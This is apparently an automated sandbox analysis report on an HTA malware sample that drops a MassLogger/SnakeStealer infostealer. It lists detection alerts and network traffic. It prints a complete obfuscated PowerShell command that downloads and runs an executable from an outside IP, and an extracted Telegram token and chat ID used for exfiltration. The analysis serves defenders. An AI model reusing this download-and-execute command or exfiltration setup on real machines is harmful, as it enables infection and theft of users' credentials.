"c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP", ProcessId: 5876, ProcessName: cvtres.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))", CommandLine: POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6652, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline", ProcessId: 1432, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T01:18:59.386361+0100	2022050	1	A Network Trojan was detected	198.12.89.24	80	192.168.2.7	49681	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T01:18:59.478632+0100	2022051	1	A Network Trojan was detected	198.12.89.24	80	192.168.2.7	49681	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T01:19:08.293433+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49682	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\cossess.exe	Avira: detection malicious, Label: TR/AD.SnakeStealer.suecj
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe	Avira: detection malicious, Label: TR/AD.SnakeStealer.suecj

Found malware configuration

Source: 00000007.00000002.2104403601.0000000002531000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7996508565:AAHHBM6wSJS6GosO-ff2t38cxPw1t-vbBj8", "Telegram Chatid": "5758197122"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\cossess.exe	ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: niceworkingskillgivenmebest.hta	Virustotal: Detection: 37%			Perma Link
Source: niceworkingskillgivenmebest.hta	ReversingLabs: Detection: 27%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49683 version: TLS 1.0

Source:	Binary string: wntdll.pdbUGP source: cossess.exe, 00000006.00000003.962684493.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, cossess.exe, 00000006.00000003.962416999.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cossess.exe, 00000006.00000003.962684493.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, cossess.exe, 00000006.00000003.962416999.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TenantRestrictions\Payloadata\Local\Temp\dkem0svg\dkem0svg.pdb source: powershell.exe, 00000003.00000002.989978831.0000000007555000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: q;C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.pdb source: powershell.exe, 00000003.00000002.981931540.0000000005393000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057445A GetFileAttributesW,FindFirstFileW,FindClose,	6_2_0057445A
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057C6D1 FindFirstFileW,FindClose,	6_2_0057C6D1
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_0057C75C
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0057EF95
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0057F0F2
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0057F3F3
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_005737EF
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00573B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00573B12
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0057BCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02345782h	7_2_02345358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 023451B9h	7_2_02344F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02345782h	7_2_023456AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A91935h	7_2_05A915F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9F028h	7_2_05A9ED80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9D088h	7_2_05A9CDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9C7D8h	7_2_05A9C530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A90FF1h	7_2_05A90D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9BF28h	7_2_05A9BC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A90741h	7_2_05A90498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9E778h	7_2_05A9E4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9DEC8h	7_2_05A9DC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A93EF8h	7_2_05A93C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A93AA0h	7_2_05A937F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9B220h	7_2_05A9AF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A931F0h	7_2_05A92F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9D93Ah	7_2_05A9D690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9A970h	7_2_05A9A6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9F8D8h	7_2_05A9F630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9A0C0h	7_2_05A99E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A91449h	7_2_05A911A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9CC30h	7_2_05A9C988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9F480h	7_2_05A9F1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9EBD0h	7_2_05A9E928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A94350h	7_2_05A940A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A90B99h	7_2_05A908F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9C380h	7_2_05A9C0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9BAD0h	7_2_05A9B828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9E320h	7_2_05A9E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A902E9h	7_2_05A90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A93648h	7_2_05A933A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9B678h	7_2_05A9B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9ADC8h	7_2_05A9AB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9FD30h	7_2_05A9FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A92D98h	7_2_05A92AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9D4E0h	7_2_05A9D238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05A9A518h	7_2_05A9A270

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 198.12.89.24:80 -> 192.168.2.7:49681
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 198.12.89.24:80 -> 192.168.2.7:49681

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Mar 2025 00:18:59 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Thu, 13 Mar 2025 12:13:30 GMTETag: "efc00-6303840057bc3"Accept-Ranges: bytesContent-Length: 982016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c8 cb d2 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 1a 06 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0f 00 00 04 00 00 40 7f 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 b4 73 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b4 73 02 00 00 70 0c 00 00 74 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 f0 0e 00 00 72 00 00 00 8a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49682 -> 193.122.6.168:80

Source: global traffic	HTTP traffic detected: GET /346/cosses.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 198.12.89.24Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49683 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.24

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_00EF7A18 URLDownloadToFileW,

3_2_00EF7A18

